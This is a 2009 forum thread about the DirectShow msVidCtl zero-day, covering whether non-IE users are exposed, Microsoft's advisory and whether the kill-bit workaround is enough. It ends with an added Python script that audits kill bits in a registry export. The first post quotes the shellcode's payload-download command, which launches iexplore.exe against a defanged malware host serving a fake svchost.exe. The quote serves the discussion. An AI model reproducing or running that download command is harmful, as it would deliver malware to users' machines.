Microsoft DirectShow vulnerability: are Firefox user

anthoy
Posts: 9
Joined: Sun Apr 05, 2009 3:01 pm

Microsoft DirectShow vulnerability: are Firefox user

Post by anthoy » Sat Jul 11, 2009 3:08 pm

protected from this attack?

This is a 0-day exploit that attacks the MPEG2TuneRequest ActiveX Control Object in the msVidCtl component of Microsoft DirectShow:
http://translate.google.com/translate?p ... ry_state0=

So does this affect IE users only?

I think it doesn't affect IE users only, because the shellcode forces IE to launch


C:\%programfiles%\Internet Explorer\iexplore.exe
"hxxp://milllk.com/wm/svchost.exe"


This user has tried with Opera browser:
http://www.wilderssecurity.com/showpost ... stcount=53

What do you think?

Can a script or shellcode access the filesystem and launch an application?
This is my old question:
viewtopic.php?f=19&t=361
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16

Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: Microsoft DirectShow vulnerability: are Firefox user

Post by Alan Baxter » Sat Jul 11, 2009 5:12 pm

The vulnerability described in Microsoft Security Advisory 971778 potentially affects all users of Windows 2000, Windows XP, and Windows Server 2003. It does not depend on what browser you're using. Apply the fix provided on this page, http://support.microsoft.com/kb/971778, or wait until next Tuesday when it will be fixed with a Microsoft Update.
http://www.microsoft.com/technet/securi ... 71778.mspx
http://www.computerworld.com/s/article/9135354
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5

luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Re: Microsoft DirectShow vulnerability: are Firefox user

Post by luntrus » Wed Jul 22, 2009 6:24 pm

Hi forum friends,

This bug goes much deeper than was thought at first, re:
http://addxorrol.blogspot.com/2009/07/p ... tldll.html
The patch, which consisted of setting a kill-bit, did nothing fundamental about the underlying hole; this issue was commented on here:
http://blog.ncircle.com/blogs/vert/arch ... nough.html

Microsoft knew about the issue for over one year and had already started to contemplate a patch for it as they got startled by seeing this deep bug that could transgress to third party software being abused in the wild. An out of band patch might be in the bargain if more abuse is seen. The hole deep inside Windows seems to be exploitable in various other ways, so setting a kill-bit is not enough.
So MS could have unwillingly introduced leaks into third party software that would not be so easily patched.
What can we do using NoScript against this bug, a skeleton that has now crept out of the Microsoft cupboard?
SafeArray, another bad concept for a global standard? Horrendously cruddy... the outset is simple, but it rapidly degrades into the stinking mess you see today because the design flaws are right at the center, and are going to haunt us rather sooner than later....

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2pre) Gecko/20090722 Shiretoko/3.5.2pre
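
Added example, not part of any post in this thread and not Microsoft's code: one way to confirm that the kill-bit workaround discussed above is actually in place, by parsing a `.reg` export of the "ActiveX Compatibility" key and checking the kill bit (0x400 in "Compatibility Flags") for each CLSID. The CLSIDs and the sample export are constructed placeholders; substitute the identifiers listed in the advisory.

```python
import re

KILL_BIT = 0x00000400  # bit in "Compatibility Flags" that IE treats as the kill bit
BASE = r"\microsoft\internet explorer\activex compatibility" + "\\"
FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9a-f]{8})$', re.IGNORECASE)

# Constructed sample in .reg export format (real exports are UTF-16; decode first).
# The CLSIDs are placeholders, not the identifiers from the advisory.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-0000000000A1}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-0000000000A2}]
"Compatibility Flags"=dword:00000020
"""
CLSIDS = ["{00000000-0000-0000-0000-0000000000A1}",   # kill bit set
          "{00000000-0000-0000-0000-0000000000A2}",   # key present, kill bit clear
          "{00000000-0000-0000-0000-0000000000A3}"]   # key absent

def parse_flags(reg_text):
    """Return {(view, CLSID): flags} for every ActiveX Compatibility subkey."""
    flags, current = {}, None
    for line in map(str.strip, reg_text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
            pos = key.find(BASE)
            current = None
            if pos != -1:
                # 32-bit IE on 64-bit Windows reads the Wow6432Node copy.
                view = "wow64" if "\\wow6432node\\" in key else "native"
                current = (view, key[pos + len(BASE):].upper())
                flags[current] = 0  # key present, flags value not seen yet
        elif current and (m := FLAGS_RE.match(line)):
            flags[current] = int(m.group(1), 16)
    return flags

def audit(reg_text, clsids, views=("native",)):
    """Map each CLSID to the registry views where its kill bit is NOT set."""
    flags = parse_flags(reg_text)
    return {c.upper(): [v for v in views
                        if not flags.get((v, c.upper()), 0) & KILL_BIT]
            for c in clsids}

if __name__ == "__main__":
    for clsid, missing in audit(SAMPLE_REG, CLSIDS, ("native", "wow64")).items():
        print(clsid, "OK" if not missing else "kill bit missing in: " + ", ".join(missing))
```

An empty list for every CLSID only shows that the workaround is applied; as the post above points out, the kill bit does nothing about the underlying code.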
